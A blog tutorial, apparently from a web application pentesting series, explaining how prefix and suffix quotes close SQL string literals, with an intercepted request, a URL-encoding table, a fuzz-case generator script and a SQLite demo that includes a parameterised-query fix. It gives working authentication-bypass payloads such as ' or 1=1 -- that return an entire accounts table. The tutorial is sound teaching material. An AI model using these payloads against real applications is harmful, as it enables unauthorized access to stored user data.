Thursday, February 13, 2014

Web App Pentest - Part 4 Suffix & Prefix in Fuzzing

In the previous article of this series we looked at fuzzing and the SQL special characters that are useful when fuzzing a web application. In this article I focus on prefixes and suffixes: where in the input string those special characters are placed in order to fuzz the target web application.

Suffix Syntax – AlphabeticsSpecialcharacters (alphabetic characters followed by a special character. The special character goes at the end, which is why it is called a suffix.)
            E.g: jonnybravo' (where jonnybravo is the alphabetic part and ' is the special character.)

Prefix Syntax – SpecialcharactersAlphabetics (a special character followed by alphabetic characters. The special character goes at the start, which is why it is called a prefix.)
     E.g: 'jonnybravo (where ' is the special character and jonnybravo is the alphabetic part.)

Let us take the suffix example, submit it to the user-info lookup page and watch the result. The picture below shows the result when I entered jonnybravo' in the username field.

Figure 1 My input string jonnybravo

GET /chintan/index.php?page=user-info.php&username=jonnybravo%27&password=&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/chintan/index.php?page=user-info.php
Cookie: showhints=0; PHPSESSID=39hb01vtdib9sov8rmmfok7kn2
Connection: keep-alive

Encoding of Special Characters in URL

After submitting that input I intercepted the request and saw that the browser percent-encodes the input before putting it in the URL, so ' became %27 by the time it was sent to the server. Below is the list of the special characters on your keyboard and the percent-encoded form the browser sends for each (one byte written as %XX; the hex digits are case-insensitive, so %5e and %5E are the same character).

! - %21
@ - %40
# - %23
$ - %24
^ - %5e
& - %26
* - %2a
( - %28
) - %29
{ - %7b
} - %7d
- - %2d
+ - %2b
[ - %5b
] - %5d
; - %3b
: - %3a
\ - %5c
| - %7c
, - %2c
< - %3c
. - %2e
> - %3e
/ - %2f
? - %3f

Note that browsers typically leave - and . unencoded in form submissions even though they have %XX forms. It makes no difference to the injection: the web server decodes the raw and the percent-encoded spelling to the same character before the application builds its SQL query, so when you craft a payload by hand you can use either.
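As an added example, not code from the original post, the small Python script below generates the suffix and prefix fuzz cases described above for a base value and percent-encodes them the way the browser did before they reached the query string. The request path and parameter names are assumptions modelled on the intercepted request shown earlier; the list of special characters is constructed from the table above.

```python
# Added example, not code from the original post: build the suffix and
# prefix fuzz cases described above and URL-encode them the way the browser
# did before they reached the query string. The path and parameter names
# are assumptions modelled on the intercepted request shown in the post.
from urllib.parse import quote, unquote, urlencode

# Constructed list: the keyboard special characters from the table above,
# plus the single quote the post fuzzes with.
SPECIALS = list("!@#$^&*(){}-+[];:\\|,<.>/?'")


def encode_param(value: str) -> str:
    """Percent-encode one query-string value.

    safe="" forces every reserved character to its %XX form so the output
    lines up with the table above. quote() never encodes '-', '.', '_' and
    '~' (the URL unreserved set), and real browsers behave the same way for
    form values, so those entries of the table arrive raw; the server
    decodes both spellings to the same character.
    """
    return quote(value, safe="")


def decode_param(value: str) -> str:
    """Undo the percent-encoding, as the web server does before PHP sees $_GET."""
    return unquote(value)


def fuzz_cases(base: str, specials=SPECIALS):
    """Yield (kind, raw, encoded) for every suffix and prefix variant of base."""
    for ch in specials:
        raw = base + ch                      # suffix: special char at the end
        yield "suffix", raw, encode_param(raw)
        raw = ch + base                      # prefix: special char at the start
        yield "prefix", raw, encode_param(raw)


def build_request_line(username: str, password: str = "") -> str:
    """Reconstruct the GET request line for the user-info page (path assumed)."""
    params = {
        "page": "user-info.php",
        "username": username,
        "password": password,
        "user-info-php-submit-button": "View Account Details",
    }
    # urlencode() uses quote_plus(): spaces become '+', '-' and '.' stay as-is,
    # which is exactly how the intercepted request in the post looks.
    return "GET /chintan/index.php?" + urlencode(params) + " HTTP/1.1"


if __name__ == "__main__":
    for kind, raw, enc in fuzz_cases("jonnybravo"):
        print(f"{kind:6} {raw:14} -> {enc}")
    print(build_request_line("jonnybravo'"))
```

Feed each encoded value straight into the username parameter and forward the request; the raw column is what the application's SQL query will actually contain after the server decodes it.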

Once I forwarded the request I got an error page, because the username is no longer valid. Here is the page.

In the message box on that error page we can see that jonnybravo' is our injection. Let us analyse the query shown in the message box:

Query: SELECT username FROM accounts WHERE username='jonnybravo'';

Looking at this query it is immediately clear why we need a suffix or a prefix: the server wraps our input in its own pair of single quotes, so our job is to finish that string literal ourselves. Written out again, the quotes come from two places:

Query: SELECT username FROM accounts WHERE username='jonnybravo'';

The opening ' before jonnybravo and the closing ' at the end are supplied by the server's query template. When we submit jonnybravo', our suffix ' pairs with the server's opening ' and closes the string literal early. The server's own closing ' is now left over with nothing to pair with, so the query is no longer valid SQL and the database raises a syntax error. That is exactly what the error page is telling us.

“If we don't close the quote, then whatever we put in our injection stays inside the string literal: it will never be executed as SQL and we will never get the error page.”

This is only the username lookup page, so that is the only query you will see running in the back end. Let us move on to the authentication page, where both the username and password fields appear in the query. I gave jonnybravo' as the username and momma as the password, so the suffix ' is added to the username while the password stays plain text. Sometimes we need both a prefix and a suffix to get our injection through. The query is as follows.

Query: SELECT * FROM accounts WHERE username='jonnybravo'' AND password='momma'

Suppose we want to get rid of the trailing part of the query, AND password='momma'. How can we do that? I am going to use ' as a prefix and (space)-- as a suffix. The reason for -- is that the back end is a MySQL server, and in MySQL -- starts a comment: everything after it up to the end of the line is ignored by the server. Note that MySQL only treats -- as a comment when it is followed by at least one whitespace character, so the space after -- is part of the payload; a trailing space is easily lost when you paste a payload into the URL bar or when the application trims input, so it is safer to send it explicitly as %20 or + in the URL.

Injection -  ' --

Then we put our payload in between the two, for example or 1=1'. So the final injection looks like this.

Injection -  ' or 1=1' --

When I give this injection in the username field, the generated error looks like the picture below.

Let us analyse our injection. The prefix ' closes the username string literal. The server passes username='...' with its own pair of quotes, and we put our injection between them, so the query fragment becomes:

username='' or 1=1' -- ' AND password=''

Here the outermost quote of each pair is the server's and the rest are ours. Taking the first two quotes together, the server's opening ' and our prefix ' make the complete, empty string '' for the username field. What follows is our payload: or 1=1' -- . As mentioned earlier, this is a MySQL server, so everything after (space)-- is a comment, which means the server's closing ' and AND password='' are ignored. The only thing left for the server to evaluate is:

username='' or 1=1'

So this is how a prefix and a suffix are used together in SQL injection. The ' after 1=1 is one I added on purpose to provoke the error on the page: it opens a string literal that is never closed, so the query fails. If I remove that extra ', the injection becomes valid SQL: '' or 1=1 is true for every row, because 1=1 is always true and the server cannot refuse that logic, so the query is executed. So my final injection becomes ' or 1=1 -- and giving this in the username field gave me the result below.

As you can see the server executed our injection and returned every row stored in the table: the condition is true for all of them, so it brings back the entire table.
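As an added example, not code from the original post or the target application, the Python script below rebuilds the two concatenated queries analysed above on top of an in-memory SQLite database so each payload can be run and its outcome checked: the lone suffix quote and the ' or 1=1' -- variant both produce a syntax error, ' or 1=1 -- returns every row, and a parameterised query (the fix, not part of the original application) returns nothing for the same payload. The accounts rows are constructed; SQLite accepts the same -- comment suffix as MySQL, though it does not require the whitespace after -- that MySQL does.

```python
# Added example, not code from the original post: rebuild the two queries
# the post analyses on top of an in-memory SQLite database so each
# prefix/suffix variant can be run and its outcome checked. The accounts
# rows are constructed. SQLite accepts the same "-- " comment suffix as
# MySQL, so the behaviour shown here matches the post; the parameterised
# version at the end is the fix, not part of the original application.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway accounts table with three constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("admin", "adminpass"), ("jonnybravo", "momma"), ("jeremy", "password")],
    )
    return con


def lookup_query(username: str) -> str:
    """The user-info page's query, built by string concatenation (vulnerable)."""
    return "SELECT username FROM accounts WHERE username='" + username + "'"


def login_query(username: str, password: str) -> str:
    """The authentication page's query, built the same vulnerable way."""
    return ("SELECT * FROM accounts WHERE username='" + username
            + "' AND password='" + password + "'")


def run(con: sqlite3.Connection, query: str):
    """Execute a concatenated query; return (rows, None) or (None, error text)."""
    try:
        return con.execute(query).fetchall(), None
    except sqlite3.OperationalError as exc:   # syntax errors land here
        return None, str(exc)


def safe_login(con: sqlite3.Connection, username: str, password: str):
    """Fixed version: bound parameters keep the quote inside the string value."""
    return con.execute(
        "SELECT * FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


def demo():
    """Run the post's payloads and return {payload: (rows, error)} for inspection."""
    con = make_db()
    return {
        "jonnybravo'":   run(con, lookup_query("jonnybravo'")),      # unpaired quote
        "' or 1=1' -- ": run(con, login_query("' or 1=1' -- ", "momma")),  # extra quote
        "' or 1=1 -- ":  run(con, login_query("' or 1=1 -- ", "momma")),   # all rows
        "safe":          (safe_login(con, "' or 1=1 -- ", "momma"), None),
    }


if __name__ == "__main__":
    for payload, (rows, err) in demo().items():
        print(f"{payload!r:18} -> {'error: ' + err if err else rows}")
```

Print the query strings from lookup_query() and login_query() alongside the results to see the same quote pairing the walkthrough above describes; the parameterised query never lets the payload's quote leave the string value, which is why it returns no rows.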

So, in this article I introduced suffixes and prefixes and how to use them to complete the SQL statement so that the server executes our injection. The idea of closing the server's own quote applies whatever database sits behind the application; only the comment syntax used as the suffix may differ (MySQL, for example, needs -- to be followed by whitespace). In the next article of this series I will focus on getting our payload executed while playing with HTML tags.

